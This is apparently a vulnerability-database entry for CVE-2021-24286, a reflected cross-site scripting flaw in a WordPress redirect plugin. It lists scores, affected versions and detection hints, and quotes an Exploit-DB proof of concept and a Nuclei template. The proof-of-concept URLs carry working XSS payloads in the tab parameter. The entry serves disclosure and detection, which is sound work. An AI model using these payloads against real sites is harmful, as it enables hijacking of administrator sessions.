CVE-2021-24286
published 2021-05-14CVE-2021-24286: The settings page of the Redirect 404 to parent WordPress plugin before 1.3.1 did not properly sanitise the tab parameter before outputting it back, leading to…
PriorityP343medium6.1CVSS 3.1
AVNACLPRNUIRSCCLILAN
EXPLOIT
EPSS
13.94%
96.1th percentile
The settings page of the Redirect 404 to parent WordPress plugin before 1.3.1 did not properly sanitise the tab parameter before outputting it back, leading to a reflected Cross-Site Scripting issue
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| moove_agency | redirect_404_to_parent | >= 1.3.1 < 1.3.1 | 1.3.1 |
| mooveagency | redirect_404_to_parent | < 1.3.1 | 1.3.1 |
Detection & IOCsextracted from sources · hover to see the quote
urlwp-admin/options-general.php?page=moove-redirect-settings&tab="+style=animation-name:rotation+onanimationstart="alert(/XSS/);↗
url/wp-admin/options-general.php?page=moove-redirect-settings&tab=%22+style%3Danimation-name%3Arotation+onanimationstart%3D%22alert%28document.domain%29%3B↗
- →Look for reflected XSS payload in the `tab` parameter of the moove-redirect-settings admin page; the unsanitised value is echoed back in the HTTP response body. ↗
- →Detect requests to options-general.php with page=moove-redirect-settings and a tab parameter containing HTML/JS injection characters (e.g. quote, style=, onanimationstart=). ↗
- →In HTTP response body, presence of both the unencoded XSS payload string and the string 'Moove redirect 404' confirms successful reflection and vulnerable plugin version. ↗
- →Attack requires an authenticated session (admin login via /wp-login.php) before triggering the XSS on the settings page. ↗
- ·The XSS is reflected (not stored), so exploitation requires tricking an authenticated admin into clicking a crafted link; it is not exploitable without user interaction. ↗
- ·Vulnerability is fixed in plugin version 1.3.1; instances running 1.3.0 or earlier are affected. ↗
CVSS provenance
nvdv3.16.1MEDIUMCVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
nvdv2.04.3MEDIUMAV:N/AC:M/Au:N/C:N/I:P/A:N
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
WordPress Plugin Redirect 404 to Parent 1.3.0 - Reflected Cross-Site Scripting
exploitdb·2021-09-29·CVSS 6.1
CVE-2021-24286 [MEDIUM] WordPress Plugin Redirect 404 to Parent 1.3.0 - Reflected Cross-Site Scripting
WordPress Plugin Redirect 404 to Parent 1.3.0 - Reflected Cross-Site Scripting
---
# Exploit Title: WordPress Plugin Redirect 404 to Parent 1.3.0 - Reflected Cross-Site Scripting (XSS)
# Date: 2/3/2021
# Author: 0xB9
# Software Link: https://downloads.wordpress.org/plugin/redirect-404-to-parent.1.3.0.zip
# Version: 1.3.0
# Tested on: Windows 10
# CVE: CVE-2021-24286
1. Description:
This plugin redirects any 404 request to the parent URL. The tab parameter in the Admin Panel is vulnerable to XSS.
2. Proof of Concept:
wp-admin/options-general.php?page=moove-redirect-settings&tab="+style=animation-name:rotation+onanimationstart="alert(/XSS/);
Nuclei
WordPress Plugin Redirect 404 to Parent 1.3.0 - Cross-Site Scripting
nuclei·CVSS 6.1
CVE-2021-24286 [MEDIUM] WordPress Plugin Redirect 404 to Parent 1.3.0 - Cross-Site Scripting
WordPress Plugin Redirect 404 to Parent 1.3.0 - Cross-Site Scripting
The settings page of the plugin did not properly sanitise the tab parameter before outputting it back, leading to a reflected Cross-Site Scripting issue.
Template:
id: CVE-2021-24286
info:
name: WordPress Plugin Redirect 404 to Parent 1.3.0 - Cross-Site Scripting
author: r3Y3r53
severity: medium
description: |
The settings page of the plugin did not properly sanitise the tab parameter before outputting it back, leading to a reflected Cross-Site Scripting issue.
impact: |
Attackers can inject malicious JavaScript via reflected XSS in the settings page, potentially stealing administrator session cookies or performing administrative actions.
remediation: Fixed in version 1.3.1
reference:
- https://wpscan.com/vulnerabilit
No writeups or analysis indexed.
http://packetstormsecurity.com/files/164328/WordPress-Redirect-404-To-Parent-1.3.0-Cross-Site-Scripting.htmlhttps://wpscan.com/vulnerability/b9a535f3-cb0b-46fe-b345-da3462584e27http://packetstormsecurity.com/files/164328/WordPress-Redirect-404-To-Parent-1.3.0-Cross-Site-Scripting.htmlhttps://wpscan.com/vulnerability/b9a535f3-cb0b-46fe-b345-da3462584e27
2021-05-14
Published